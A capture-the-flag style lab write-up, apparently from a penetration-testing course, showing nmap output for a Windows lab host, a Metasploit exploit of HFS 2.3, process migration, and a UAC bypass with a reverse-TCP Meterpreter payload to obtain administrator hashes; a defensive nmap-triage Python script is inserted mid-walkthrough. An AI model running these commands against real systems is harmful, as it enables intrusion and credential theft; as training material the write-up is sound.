In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable server will be accessible at demo.ine.local.
Your task is to fingerprint the application using the tools available on the Kali machine and exploit it using the appropriate Metasploit module. Then bypass UAC using the Memory Injection Metasploit local exploit module.
Objective: Gain the highest privilege on the compromised machine and get administrator user NTLM hash.
Tools
The best tools for this lab are:
Nmap
Metasploit Framework
Writeup
nmap -sSVC demo.ine.local
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: VICTIM
| NetBIOS_Domain_Name: VICTIM
| NetBIOS_Computer_Name: VICTIM
| DNS_Domain_Name: victim
| DNS_Computer_Name: victim
| Product_Version: 6.3.9600
|_ System_Time: 2025-06-10T17:39:06+00:00
|_ssl-date: 2025-06-10T17:39:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=victim
| Not valid before: 2025-06-09T17:36:10
|_Not valid after: 2025-12-09T17:36:10
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-10T17:39:09
|_ start_date: 2025-06-10T17:36:07
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
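As an added, defender-side example (not part of the lab writeup): a small Python triage script that parses nmap's normal output, as shown above, and turns the findings into remediation items. The embedded scan text is a constructed excerpt of the output above; the severity labels and recommendations are this example's own.

```python
import re

# Constructed excerpt of the nmap output shown in the writeup, embedded so the script runs offline.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
Host script results:
| smb2-security-mode:
|_ Message signing enabled but not required
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

# Matches a port line of nmap's normal output: "80/tcp open http HttpFileServer httpd 2.3"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(scan):
    """Return one dict per port line (port, proto, state, service, version)."""
    ports = []
    for line in scan.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version.strip()})
    return ports


def triage(scan):
    """Map the scan to (severity, port or 'smb', recommendation) tuples for a remediation list."""
    findings = []
    for p in parse_ports(scan):
        if p["state"] != "open":
            continue
        if "HttpFileServer" in p["version"] and p["version"].endswith("2.3"):
            findings.append(("high", p["port"], "Rejetto HFS 2.3 exposed; a public Metasploit "
                             "module (rejetto_hfs_exec) targets it. Upgrade or remove the service."))
        if p["port"] == 3389:
            findings.append(("medium", p["port"], "RDP reachable from the scanner; restrict it "
                             "to a VPN or jump host and require Network Level Authentication."))
    # Either SMB1 signing disabled or SMB2 signing "not required" leaves relay attacks possible.
    if re.search(r"message_signing:\s*disabled", scan) or "Message signing enabled but not required" in scan:
        findings.append(("medium", "smb", "SMB signing not required; enforce it via Group Policy."))
    return findings


if __name__ == "__main__":
    for severity, where, advice in triage(SAMPLE_SCAN):
        print(f"[{severity}] {where}: {advice}")
```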
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set rhosts demo.ine.local
run
ps -S explorer.exe
migrate 2124
shell
net localgroup administrators
Ctrl + C
background
use exploit/windows/local/bypassuac_injection
set session 1
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run